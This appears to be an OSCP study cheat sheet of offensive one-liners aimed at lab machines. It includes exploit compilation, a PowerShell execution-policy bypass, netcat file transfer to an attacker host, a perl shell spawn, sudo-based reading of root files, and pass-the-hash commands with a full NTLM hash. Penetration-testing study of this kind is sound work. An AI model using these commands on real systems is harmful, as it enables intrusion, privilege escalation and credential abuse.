OSCP
Search…
MISC
Compiling Exploits
1
gcc -o exploit exploit.c
2
#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
3
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
4
5
Cross compiling
6
Compile Windows exploit in Linux
7
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
8
9
Compile Python script to executable
10
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
Copied!
Packet Inspection
1
tcpdump tcp port 80 -w output.pcap -i eth0
2
Copied!
Powershell bypass
1
Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
2
Copied!
Window Exploit Suggester
1
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
Copied!
Finding Auxiliary
1
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
2
Copied!
Netcat
1
From attacker to target
2
At target
3
nc -lvp 6969 > blah.txt
4
At attacker (method 1)
5
nc x.x.x.x 6969 < blah.txt
6
At attacker (method 2)
7
cat blah.txt | nc x.x.x.x 6969
Copied!
Perl Exploit
1
Perl Exploit
2
perl —e 'exec "/bin/sh";'
3
sudo perl -F: -lane 'print $F[0]' /root/root.txt
Copied!
Awk
1
Remove duplicate lines:
2
awk '!seen[$0]++' file
Copied!
Searchsploit
1
searchsploit --overflow --exact --mirror 21234
2
3
searchsploit --overflow --exact Gwolle
Copied!
Firewall Rule Enable
1
firewall rule enable
2
ufw allow from victimip to any port 80,443 proto tcp
3
Copied!
Wordlist Creation
1
Wordlist creation:
2
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
Copied!
PASS the HASH
1
2
Pass the hash :
3
pth-winexe -U jenkins/administrator //ip cmd.exe
4
pth-winexe -U jenkins/administrator%password //ip cmd.exe
5
crackmapexec
6
7
pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
8
Copied!
Share folder Windows to linux
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
Last modified 1yr ago
Copy link